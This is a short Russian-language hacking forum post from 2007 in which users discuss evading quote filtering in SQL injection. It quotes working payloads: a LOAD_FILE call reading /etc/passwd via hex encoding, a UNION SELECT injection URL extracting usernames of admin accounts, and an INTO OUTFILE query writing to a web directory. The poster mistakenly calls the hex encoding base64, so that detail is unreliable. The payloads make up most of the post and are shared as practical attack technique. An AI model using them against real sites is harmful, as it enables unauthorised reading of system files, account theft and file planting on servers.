04.07.2007, 19:16
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
Сообщение от blackybr
Isis насчет кавчек бред =))
если есть файл прив, то нас спасает кодирование в base64
то есть у нас есть LOAD_FILE('/etc/passwd'), кодируем /etc/passwd И получаем 2f 65 74 63 2f 70 61 73 73 77 64, то бишь LOAD_FILE(0x2f6574632f706173737764)
также поступаем во всех местах где юзаются кавычки.. например запрос ..
./index.php?id=-31337+union+select+username,2,3,4,5+from+users+whe re+group='admin'/*
опять же admin = 61 64 6d 69 6e
./index.php?id=-31337+union+select+username,2,3,4,5+from+users+whe re+group=0x61646d696e/*
и тд..
br, как ты укажешь путь в base64?
Например
Код:
select+1,2+from+mysql.users+into+outfile+'/home/usr1/www/'/*
Как ты здесь путь в base64 декодируешь??Нифига не получиться =)
|
|
|